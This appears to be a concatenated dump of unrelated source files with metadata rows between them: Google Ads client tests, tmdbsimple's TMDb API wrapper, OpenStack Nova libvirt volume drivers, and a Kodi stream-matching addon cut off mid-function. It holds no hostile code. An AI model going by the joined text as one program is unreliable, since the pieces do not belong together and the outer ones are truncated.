assert expected == actual
def test_common_folder_path():
folder = "cuttlefish"
expected = "folders/{folder}".format(folder=folder, )
actual = CustomAudienceServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "mussel",
}
path = CustomAudienceServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = CustomAudienceServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "winkle"
expected = "organizations/{organization}".format(organization=organization, )
actual = CustomAudienceServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nautilus",
}
path = CustomAudienceServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = CustomAudienceServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "scallop"
expected = "projects/{project}".format(project=project, )
actual = CustomAudienceServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "abalone",
}
path = CustomAudienceServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = CustomAudienceServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "squid"
location = "clam"
expected = "projects/{project}/locations/{location}".format(project=project, location=location, )
actual = CustomAudienceServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "whelk",
"location": "octopus",
}
path = CustomAudienceServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = CustomAudienceServiceClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(transports.CustomAudienceServiceTransport, '_prep_wrapped_messages') as prep:
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(transports.CustomAudienceServiceTransport, '_prep_wrapped_messages') as prep:
transport_class = CustomAudienceServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
| apache-2.0 | -7,432,984,637,234,446,000 | 42.836025 | 217 | 0.682555 | false | 4.066375 | true | false | false |
coronary/RandomEpisode | depends/Lib/site-packages/tmdbsimple/people.py | 1 | 7235 | # -*- coding: utf-8 -*-
"""
tmdbsimple.people
~~~~~~~~~~~~~~~~~
This module implements the People, Credits, and Jobs functionality
of tmdbsimple.
Created by Celia Oakley on 2013-10-31.
:copyright: (c) 2013-2017 by Celia Oakley
:license: GPLv3, see LICENSE for more details
"""
from .base import TMDB
class People(TMDB):
"""
People functionality.
See: http://docs.themoviedb.apiary.io/#people
"""
BASE_PATH = 'person'
URLS = {
'info': '/{id}',
'movie_credits': '/{id}/movie_credits',
'tv_credits': '/{id}/tv_credits',
'combined_credits': '/{id}/combined_credits',
'external_ids': '/{id}/external_ids',
'images': '/{id}/images',
'changes': '/{id}/changes',
'popular': '/popular',
'latest': '/latest',
}
def __init__(self, id=0):
super(People, self).__init__()
self.id = id
def info(self, **kwargs):
"""
Get the general person information for a specific id.
Args:
append_to_response: (optional) Comma separated, any person method.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('info')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def movie_credits(self, **kwargs):
"""
Get the movie credits for a specific person id.
Args:
language: (optional) ISO 639-1 code.
append_to_response: (optional) Comma separated, any person method.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('movie_credits')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def tv_credits(self, **kwargs):
"""
Get the TV credits for a specific person id.
Args:
language: (optional) ISO 639-1 code.
append_to_response: (optional) Comma separated, any person method.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('tv_credits')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def combined_credits(self, **kwargs):
"""
Get the combined (movie and TV) credits for a specific person id.
To get the expanded details for each TV record, call the /credit method
with the provided credit_id. This will provide details about which
episode and/or season the credit is for.
Args:
language: (optional) ISO 639-1 code.
append_to_response: (optional) Comma separated, any person method.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('combined_credits')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def external_ids(self, **kwargs):
"""
Get the external ids for a specific person id.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('external_ids')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def images(self, **kwargs):
"""
Get the images for a specific person id.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('images')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def changes(self, **kwargs):
"""
Get the changes for a specific person id.
Changes are grouped by key, and ordered by date in descending order.
By default, only the last 24 hours of changes are returned. The maximum
number of days that can be returned in a single request is 14. The
language is present on fields that are translatable.
Args:
start_date: (optional) Expected format is 'YYYY-MM-DD'.
end_date: (optional) Expected format is 'YYYY-MM-DD'.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('changes')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def popular(self, **kwargs):
"""
Get the list of popular people on The Movie Database. This list
refreshes every day.
Args:
page: (optional) Minimum 1, maximum 1000.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_path('popular')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def latest(self, **kwargs):
"""
Get the latest person id.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_path('latest')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
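# Illustrative usage sketch added for documentation only; nothing in this module
# calls it. The person id and the append_to_response value are placeholder
# assumptions, and tmdbsimple's API key must be configured before any request
# is actually made.
def _people_usage_example():
    person = People(287)
    info = person.info(append_to_response='movie_credits')
    # Top-level keys of the JSON response are also set as attributes on person.
    return info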
class Credits(TMDB):
"""
Credits functionality.
See: http://docs.themoviedb.apiary.io/#credits
"""
BASE_PATH = 'credit'
URLS = {
'info': '/{credit_id}',
}
def __init__(self, credit_id):
super(Credits, self).__init__()
self.credit_id = credit_id
def info(self, **kwargs):
"""
Get the detailed information about a particular credit record. This is
currently only supported with the new credit model found in TV. These
ids can be found from any TV credit response as well as the tv_credits
and combined_credits methods for people.
The episodes object returns a list of episodes and are generally going
to be guest stars. The season array will return a list of season
numbers. Season credits are credits that were marked with the
"add to every season" option in the editing interface and are
assumed to be "season regulars".
Args:
language: (optional) ISO 639-1 code.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_credit_id_path('info')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
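# Illustrative usage sketch for Credits (documentation only, never called); the
# credit id below is a made-up placeholder, not a real TMDb credit record.
def _credits_usage_example():
    credit = Credits('0123456789abcdef01234567')
    return credit.info(language='en')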
class Jobs(TMDB):
"""
Jobs functionality.
See: http://docs.themoviedb.apiary.io/#jobs
"""
BASE_PATH = 'job'
URLS = {
'list': '/list',
}
def list(self, **kwargs):
"""
Get a list of valid jobs.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_path('list')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
| mit | 481,468,421,621,754,600 | 27.710317 | 80 | 0.581617 | false | 4.170029 | false | false | false |
ruslanloman/nova | nova/virt/libvirt/volume/volume.py | 1 | 16814 | # Copyright 2011 OpenStack Foundation
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Volume drivers for libvirt."""
import os
from os_brick.initiator import connector
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
import six
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LW
from nova import paths
from nova import utils
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import utils as libvirt_utils
LOG = logging.getLogger(__name__)
volume_opts = [
cfg.IntOpt('num_iscsi_scan_tries',
default=5,
help='Number of times to rescan iSCSI target to find volume'),
cfg.IntOpt('num_iser_scan_tries',
default=5,
help='Number of times to rescan iSER target to find volume'),
cfg.StrOpt('rbd_user',
help='The RADOS client name for accessing rbd volumes'),
cfg.StrOpt('rbd_secret_uuid',
               help='The libvirt UUID of the secret for the rbd_user '
'volumes'),
cfg.StrOpt('nfs_mount_point_base',
default=paths.state_path_def('mnt'),
help='Directory where the NFS volume is mounted on the'
' compute node'),
cfg.StrOpt('nfs_mount_options',
help='Mount options passed to the NFS client. See section '
'of the nfs man page for details'),
cfg.BoolOpt('iscsi_use_multipath',
default=False,
help='Use multipath connection of the iSCSI volume'),
cfg.BoolOpt('iser_use_multipath',
default=False,
help='Use multipath connection of the iSER volume'),
cfg.ListOpt('qemu_allowed_storage_drivers',
default=[],
help='Protocols listed here will be accessed directly '
'from QEMU. Currently supported protocols: [gluster]'),
cfg.StrOpt('iscsi_iface',
deprecated_name='iscsi_transport',
help='The iSCSI transport iface to use to connect to target in '
'case offload support is desired. Default format is of '
'the form <transport_name>.<hwaddress> where '
'<transport_name> is one of (be2iscsi, bnx2i, cxgb3i, '
                    'cxgb4i, qla4xxx, ocs) and <hwaddress> is the MAC address '
'of the interface and can be generated via the '
'iscsiadm -m iface command. Do not confuse the '
'iscsi_iface parameter to be provided here with the '
'actual transport name.'),
# iser is also supported, but use LibvirtISERVolumeDriver
# instead
]
CONF = cfg.CONF
CONF.register_opts(volume_opts, 'libvirt')
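# Illustrative sketch (documentation only, not used by the drivers below): the
# general shape of the connection_info dict these volume drivers consume. The
# exact keys depend on the Cinder backend; every value here is a placeholder
# assumption, not data from a real deployment.
_EXAMPLE_CONNECTION_INFO = {
    'driver_volume_type': 'iscsi',
    'serial': 'volume-serial-placeholder',
    'data': {
        'target_iqn': 'iqn.2010-10.org.openstack:volume-placeholder',
        'target_lun': 0,
        'target_portal': '192.168.0.10:3260',
        'auth_method': 'CHAP',
        'access_mode': 'rw',
        'qos_specs': {'total_bytes_sec': 1048576},
    },
}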
class LibvirtBaseVolumeDriver(object):
"""Base class for volume drivers."""
def __init__(self, connection, is_block_dev):
self.connection = connection
self.is_block_dev = is_block_dev
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = vconfig.LibvirtConfigGuestDisk()
conf.driver_name = libvirt_utils.pick_disk_driver_name(
self.connection._host.get_version(),
self.is_block_dev
)
conf.source_device = disk_info['type']
conf.driver_format = "raw"
conf.driver_cache = "none"
conf.target_dev = disk_info['dev']
conf.target_bus = disk_info['bus']
conf.serial = connection_info.get('serial')
# Support for block size tuning
data = {}
if 'data' in connection_info:
data = connection_info['data']
if 'logical_block_size' in data:
conf.logical_block_size = data['logical_block_size']
if 'physical_block_size' in data:
conf.physical_block_size = data['physical_block_size']
# Extract rate_limit control parameters
if 'qos_specs' in data and data['qos_specs']:
tune_opts = ['total_bytes_sec', 'read_bytes_sec',
'write_bytes_sec', 'total_iops_sec',
'read_iops_sec', 'write_iops_sec']
specs = data['qos_specs']
if isinstance(specs, dict):
for k, v in six.iteritems(specs):
if k in tune_opts:
new_key = 'disk_' + k
setattr(conf, new_key, v)
else:
LOG.warn(_LW('Unknown content in connection_info/'
'qos_specs: %s'), specs)
# Extract access_mode control parameters
if 'access_mode' in data and data['access_mode']:
access_mode = data['access_mode']
if access_mode in ('ro', 'rw'):
conf.readonly = access_mode == 'ro'
else:
LOG.error(_LE('Unknown content in '
'connection_info/access_mode: %s'),
access_mode)
raise exception.InvalidVolumeAccessMode(
access_mode=access_mode)
return conf
def _get_secret_uuid(self, conf, password=None):
secret = self.connection._host.find_secret(conf.source_protocol,
conf.source_name)
if secret is None:
secret = self.connection._host.create_secret(conf.source_protocol,
conf.source_name,
password)
return secret.UUIDString()
def _delete_secret_by_name(self, connection_info):
source_protocol = connection_info['driver_volume_type']
netdisk_properties = connection_info['data']
if source_protocol == 'rbd':
return
elif source_protocol == 'iscsi':
usage_type = 'iscsi'
usage_name = ("%(target_iqn)s/%(target_lun)s" %
netdisk_properties)
self.connection._host.delete_secret(usage_type, usage_name)
def connect_volume(self, connection_info, disk_info):
"""Connect the volume. Returns xml for libvirt."""
pass
def disconnect_volume(self, connection_info, disk_dev):
"""Disconnect the volume."""
pass
class LibvirtVolumeDriver(LibvirtBaseVolumeDriver):
"""Class for volumes backed by local file."""
def __init__(self, connection):
super(LibvirtVolumeDriver,
self).__init__(connection, is_block_dev=True)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "block"
conf.source_path = connection_info['data']['device_path']
return conf
class LibvirtFakeVolumeDriver(LibvirtBaseVolumeDriver):
"""Driver to attach fake volumes to libvirt."""
def __init__(self, connection):
super(LibvirtFakeVolumeDriver,
self).__init__(connection, is_block_dev=True)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtFakeVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "network"
conf.source_protocol = "fake"
conf.source_name = "fake"
return conf
class LibvirtNetVolumeDriver(LibvirtBaseVolumeDriver):
"""Driver to attach Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtNetVolumeDriver,
self).__init__(connection, is_block_dev=False)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtNetVolumeDriver,
self).get_config(connection_info, disk_info)
netdisk_properties = connection_info['data']
conf.source_type = "network"
conf.source_protocol = connection_info['driver_volume_type']
conf.source_name = netdisk_properties.get('name')
conf.source_hosts = netdisk_properties.get('hosts', [])
conf.source_ports = netdisk_properties.get('ports', [])
auth_enabled = netdisk_properties.get('auth_enabled')
if (conf.source_protocol == 'rbd' and
CONF.libvirt.rbd_secret_uuid):
conf.auth_secret_uuid = CONF.libvirt.rbd_secret_uuid
auth_enabled = True # Force authentication locally
if CONF.libvirt.rbd_user:
conf.auth_username = CONF.libvirt.rbd_user
if conf.source_protocol == 'iscsi':
try:
conf.source_name = ("%(target_iqn)s/%(target_lun)s" %
netdisk_properties)
target_portal = netdisk_properties['target_portal']
except KeyError:
raise exception.NovaException(_("Invalid volume source data"))
ip, port = utils.parse_server_string(target_portal)
if ip == '' or port == '':
raise exception.NovaException(_("Invalid target_lun"))
conf.source_hosts = [ip]
conf.source_ports = [port]
if netdisk_properties.get('auth_method') == 'CHAP':
auth_enabled = True
conf.auth_secret_type = 'iscsi'
password = netdisk_properties.get('auth_password')
conf.auth_secret_uuid = self._get_secret_uuid(conf, password)
if auth_enabled:
conf.auth_username = (conf.auth_username or
netdisk_properties['auth_username'])
conf.auth_secret_type = (conf.auth_secret_type or
netdisk_properties['secret_type'])
conf.auth_secret_uuid = (conf.auth_secret_uuid or
netdisk_properties['secret_uuid'])
return conf
def disconnect_volume(self, connection_info, disk_dev):
"""Detach the volume from instance_name."""
super(LibvirtNetVolumeDriver,
self).disconnect_volume(connection_info, disk_dev)
self._delete_secret_by_name(connection_info)
class LibvirtISCSIVolumeDriver(LibvirtBaseVolumeDriver):
"""Driver to attach Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtISCSIVolumeDriver, self).__init__(connection,
is_block_dev=True)
# Call the factory here so we can support
# more than x86 architectures.
self.connector = connector.InitiatorConnector.factory(
'ISCSI', utils._get_root_helper(),
use_multipath=CONF.libvirt.iscsi_use_multipath,
device_scan_attempts=CONF.libvirt.num_iscsi_scan_tries,
transport=self._get_transport())
def _get_transport(self):
if CONF.libvirt.iscsi_iface:
transport = CONF.libvirt.iscsi_iface
else:
transport = 'default'
return transport
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtISCSIVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "block"
conf.source_path = connection_info['data']['device_path']
return conf
def connect_volume(self, connection_info, disk_info):
"""Attach the volume to instance_name."""
LOG.debug("Calling os-brick to attach iSCSI Volume")
device_info = self.connector.connect_volume(connection_info['data'])
LOG.debug("Attached iSCSI volume %s", device_info)
connection_info['data']['device_path'] = device_info['path']
def disconnect_volume(self, connection_info, disk_dev):
"""Detach the volume from instance_name."""
LOG.debug("calling os-brick to detach iSCSI Volume")
self.connector.disconnect_volume(connection_info['data'], None)
LOG.debug("Disconnected iSCSI Volume %s", disk_dev)
super(LibvirtISCSIVolumeDriver,
self).disconnect_volume(connection_info, disk_dev)
class LibvirtISERVolumeDriver(LibvirtISCSIVolumeDriver):
"""Driver to attach Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtISERVolumeDriver, self).__init__(connection)
# Call the factory here so we can support
# more than x86 architectures.
self.connector = connector.InitiatorConnector.factory(
'ISER', utils._get_root_helper(),
use_multipath=CONF.libvirt.iser_use_multipath,
device_scan_attempts=CONF.libvirt.num_iser_scan_tries,
transport=self._get_transport())
def _get_transport(self):
return 'iser'
class LibvirtNFSVolumeDriver(LibvirtBaseVolumeDriver):
"""Class implements libvirt part of volume driver for NFS."""
def __init__(self, connection):
"""Create back-end to nfs."""
super(LibvirtNFSVolumeDriver,
self).__init__(connection, is_block_dev=False)
def _get_device_path(self, connection_info):
path = os.path.join(CONF.libvirt.nfs_mount_point_base,
utils.get_hash_str(connection_info['data']['export']))
path = os.path.join(path, connection_info['data']['name'])
return path
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtNFSVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = 'file'
conf.source_path = connection_info['data']['device_path']
conf.driver_format = connection_info['data'].get('format', 'raw')
return conf
def connect_volume(self, connection_info, disk_info):
"""Connect the volume. Returns xml for libvirt."""
options = connection_info['data'].get('options')
self._ensure_mounted(connection_info['data']['export'], options)
connection_info['data']['device_path'] = \
self._get_device_path(connection_info)
def disconnect_volume(self, connection_info, disk_dev):
"""Disconnect the volume."""
export = connection_info['data']['export']
mount_path = os.path.join(CONF.libvirt.nfs_mount_point_base,
utils.get_hash_str(export))
try:
utils.execute('umount', mount_path, run_as_root=True)
except processutils.ProcessExecutionError as exc:
if ('device is busy' in exc.message or
'target is busy' in exc.message):
LOG.debug("The NFS share %s is still in use.", export)
else:
LOG.exception(_LE("Couldn't unmount the NFS share %s"), export)
def _ensure_mounted(self, nfs_export, options=None):
"""@type nfs_export: string
@type options: string
"""
mount_path = os.path.join(CONF.libvirt.nfs_mount_point_base,
utils.get_hash_str(nfs_export))
if not libvirt_utils.is_mounted(mount_path, nfs_export):
self._mount_nfs(mount_path, nfs_export, options, ensure=True)
return mount_path
def _mount_nfs(self, mount_path, nfs_share, options=None, ensure=False):
"""Mount nfs export to mount path."""
utils.execute('mkdir', '-p', mount_path)
# Construct the NFS mount command.
nfs_cmd = ['mount', '-t', 'nfs']
if CONF.libvirt.nfs_mount_options is not None:
nfs_cmd.extend(['-o', CONF.libvirt.nfs_mount_options])
if options:
nfs_cmd.extend(options.split(' '))
nfs_cmd.extend([nfs_share, mount_path])
try:
utils.execute(*nfs_cmd, run_as_root=True)
except processutils.ProcessExecutionError as exc:
if ensure and 'already mounted' in exc.message:
LOG.warn(_LW("%s is already mounted"), nfs_share)
else:
raise
| apache-2.0 | -3,995,553,806,361,658,000 | 40.210784 | 79 | 0.591352 | false | 4.235264 | true | false | false |
Quihico/repository.spartacus | script.trtv/streaming.py | 1 | 24691 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2014 Sean Poyser and Richard Dean ([email protected]) - With acknowledgement to some original code by twinther (Tommy Winther)
#
import xbmc
from xml.etree import ElementTree
from xml.parsers.expat import ExpatError
import ConfigParser
import os
# get_ident is needed by OrderedDict.__repr__ below (recursion guard)
try:
    from thread import get_ident as _get_ident
except ImportError:
    from dummy_thread import get_ident as _get_ident
import re
import xbmcaddon
import urllib
import requests
import json
import dixie
ADDON = dixie.ADDON
SF_METALLIQ = dixie.GetSetting('SF_METALLIQ')
autoplay = dixie.GetSetting('autoplay')
LOCAL = dixie.GetSetting('local.ini') == 'true'
FTVINI = dixie.GetSetting('ftv.ini')
datapath = dixie.PROFILE
class StreamsService(object):
def __init__(self):
self.addonsParser = ConfigParser.ConfigParser(dict_type=OrderedDict)
self.addonsParser.optionxform = lambda option: option
iniFiles = self.getIniFiles()
for file in iniFiles:
try: self.addonsParser.read(file)
except: pass
def getIniFiles(self):
files = []
import glob
ini = os.path.join(datapath, 'ini', '*.*')
files = glob.glob(ini)
for i in range(10):
file = dixie.GetSetting('INI_%d' % i)
if len(file) > 0:
if file not in files:
files.append(file)
if os.path.exists(os.path.join(datapath,'addons.ini')):
files.append(os.path.join(datapath, 'addons.ini'))
return files
def loadFavourites(self):
entries = list()
path = xbmc.translatePath('special://profile/favourites.xml')
if os.path.exists(path):
f = open(path)
xml = f.read()
f.close()
try:
doc = ElementTree.fromstring(xml)
for node in doc.findall('favourite'):
value = node.text
value = node.text.replace(',return','')
if value[0:11] == 'PlayMedia("':
value = value[11:-2]
elif value[0:10] == 'PlayMedia(':
value = value[10:-1]
elif value[0:22] == 'ActivateWindow(10025,"':
value = value[22:-2]
elif value[0:21] == 'ActivateWindow(10025,':
value = value[22:-1]
elif value[0:22] == 'ActivateWindow(10001,"':
value = value[22:-2]
elif value[0:21] == 'ActivateWindow(10001,':
value = value[22:-1]
else:
continue
entries.append((node.get('name'), value))
except ExpatError:
pass
return entries
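    # Illustrative sketch of the favourites.xml entries the parser above expects
    # (addon paths and channel names are placeholders, not from a real install):
    #
    #   <favourites>
    #       <favourite name="Some Channel">PlayMedia("plugin://some.addon/?url=live")</favourite>
    #       <favourite name="Other Channel">ActivateWindow(10025,"plugin://other.addon/",return)</favourite>
    #   </favourites>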
def loadPlaylist(self):
iptv_type = dixie.GetSetting('playlist.type')
IPTV_URL = '0'
IPTV_FILE = '1'
entries = list()
label = ''
value = ''
if iptv_type == IPTV_FILE:
path = os.path.join(dixie.GetSetting('playlist.file'))
else:
url = dixie.GetSetting('playlist.url')
path = os.path.join(datapath, 'playlist.m3u')
try:
request = requests.get(url)
playlist = request.content
with open(path, 'wb') as f:
f.write(playlist)
except: pass
if os.path.exists(path):
f = open(path)
playlist = f.readlines()
f.close()
for line in playlist:
if line.startswith('#EXTINF:'):
label = line.split(',')[-1].strip()
elif line.startswith('rtmp') or line.startswith('rtmpe') or line.startswith('rtsp') or line.startswith('http'):
value = line.replace('rtmp://$OPT:rtmp-raw=', '').replace('\n', '')
entries.append((label, value))
return entries
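    # Illustrative sketch of the playlist format loadPlaylist() parses
    # (channel names and URLs are placeholders):
    #
    #   #EXTM3U
    #   #EXTINF:-1,Channel One
    #   http://example.com/stream1.m3u8
    #   #EXTINF:-1,Channel Two
    #   rtmp://example.com/live/stream2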
def locateSuperFavourites(self, title):
SUPERFAVES = 'plugin.program.super.favourites'
SF_INSTALLED = xbmc.getCondVisibility('System.HasAddon(%s)' % SUPERFAVES) == 1
if not SF_INSTALLED:
return None
sfAddon = xbmcaddon.Addon(id = SUPERFAVES)
# Detect the root folder for SF items, set to default if not already set
ROOT = sfAddon.getSetting('FOLDER')
if not ROOT:
ROOT = 'special://profile/addon_data/plugin.program.super.favourites'
folder = os.path.join(ROOT, 'Super Favourites')
items = []
self._locateSuperFavourites(title.upper(), folder, items)
return items
def _locateSuperFavourites(self, title, folder, items):
import sfile
import settings
import urllib
current, dirs, files = sfile.walk(folder)
for dir in dirs:
folder = os.path.join(current, dir)
# check against SF list, if it exists then match up
if dir.upper() == title:
# cfg = os.path.join(folder, 'folder.cfg')
# autoplay = settings.get('AUTOPLAY', cfg)
if autoplay == 'true':
uTitle = urllib.quote_plus(title)
mode = 5400
uFolder = urllib.quote_plus(folder)
toAdd = 'plugin://plugin.program.super.favourites/?label=%s&mode=%d&path=%s' % (uTitle, mode, uFolder)
else:
uTitle = urllib.quote_plus(title)
mode = 400
uFolder = urllib.quote_plus(folder)
toAdd = 'plugin://plugin.program.super.favourites/?label=%s&mode=%d&path=%s' % (uTitle, mode, uFolder)
toAdd = '__SF__ActivateWindow(10025,"%s",return)' % toAdd
xbmc.log('##### FOLDER: %s' % folder)
if os.path.exists(xbmc.translatePath(os.path.join(folder,'favourites.xml'))):
items.append(['SF_'+folder, toAdd])
self._locateSuperFavourites(title, folder, items)
def getAddons(self):
return self.addonsParser.sections()
def getAddonStreams(self, id):
return self.addonsParser.items(id)
def detectStream(self, channel, catchup=''):
"""
@param channel:
@type channel: source.Channel
"""
matches = list()
xbmc.log('CATCHUP: %s'%catchup)
# If user chooses to watch via catchup then call meta addons
if catchup != '':
catchup = catchup.replace(' ','+')
stream = ('plugin://plugin.video.metalliq/%s' % (catchup))
matches.append(('plugin.video.metalliq', 'Catchup', [str(stream)]))
# For a live tv selection grab valid ini files and present options
else:
# Get any Super Favourites with channel name
superFaves = self.locateSuperFavourites(channel.id)
xbmc.log('### SF: %s' % superFaves)
if superFaves:
if len(superFaves) == 1 and not '-metalliq' in superFaves[0][0]:
matches.append((superFaves[0][0], 'Social Share', superFaves[0][1]))
elif len(superFaves) == 1 and '-metalliq' in superFaves[0][0] and SF_METALLIQ == 'true':
matches.append((superFaves[0][0], 'MetalliQ', superFaves[0][1]))
else:
index = 0
for superFave in superFaves:
if '-metalliq' in superFave[0] and SF_METALLIQ == 'true':
label = 'MetalliQ'
matches.append((superFave[0], label, superFave[1]))
elif not '-metalliq' in superFave[0]:
if len(superFaves) == 2 and ('-metalliq' in superFaves[0][0] or '-metalliq' in superFaves[1][0]):
label = 'Social Share'
else:
index += 1
label = 'Social Share (%d)' % index
matches.append((superFave[0], label, superFave[1]))
# Get any Add-ons with channel name
for id in self.getAddons():
try:
xbmcaddon.Addon(id)
except Exception:
pass # ignore addons that are not installed
for (label, stream) in self.getAddonStreams(id):
label = label.upper()
label_temp = label.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(label_temp) > 9:
label_temp = label_temp.replace('CINEMA','').replace('MOVIES','')
channel.title = channel.title.upper().replace('_',' ')
channel_temp = channel.title.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(channel_temp) > 9:
channel_temp = channel_temp.replace('CINEMA','').replace('MOVIES','')
# If meta is chosen we clean the name up a bit more
if SF_METALLIQ == 'false':
if id == "plugin.video.metalliq" or id == "plugin.video.meta":
label = channel.title
chanx = channel.title.replace(" ","+").replace("_","+")
if chanx.endswith("%20HDTV"):
chanx = chanx.replace("%20HDTV","")
if chanx.endswith("%20HD"):
chanx = chanx.replace("%20HD","")
if chanx.endswith("%20PLUS1"):
chanx = chanx.replace("%20PLUS1","")
stream = str(stream.replace("<channel>",'live/%s/None/en'% chanx))
xbmc.log('STREAM: %s'%stream)
if type(stream) is list:
stream = stream[0]
if (channel_temp in label_temp) or (label_temp in channel_temp):
# Workaround for getting clean id if ini contains badly formatted items
if stream.startswith('plugin://') and not 'plugin.program.super.favourites' in stream:
idtemp = stream.split('plugin://')[1]
xbmc.log('idtemp: %s' % idtemp)
id = idtemp.split('/')[0]
# Clean up badly formatted labels in the ini files
label = re.sub('[:\\/?\<>|"]', '', label)
label = label.strip()
try:
label = label.encode('ascii', 'ignore')
except:
try:
label = label.decode('utf-8').encode('ascii', 'ignore')
except:
label = label
matches.append((id, label, stream))
# Get any Kodi Favourites with channel name
kodiFaves = self.loadFavourites()
if kodiFaves:
id = 'kodi-favourite'
for (label, stream) in kodiFaves:
label = label.upper()
label_temp = label.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(label_temp) > 9:
label_temp = label_temp.replace('CINEMA','').replace('MOVIES','')
channel.title = channel.title.upper()
channel_temp = channel.title.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(channel_temp) > 9:
channel_temp = channel_temp.replace('CINEMA','').replace('MOVIES','')
if (channel_temp in label_temp) or (label_temp in channel_temp):
matches.append((id, label, stream))
# Get any Playlist entries with channel name
iptvPlaylist = self.loadPlaylist()
if iptvPlaylist:
id = 'iptv-playlist'
for (label, stream) in iptvPlaylist:
label = label.upper()
label_temp = label.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(label_temp) > 9:
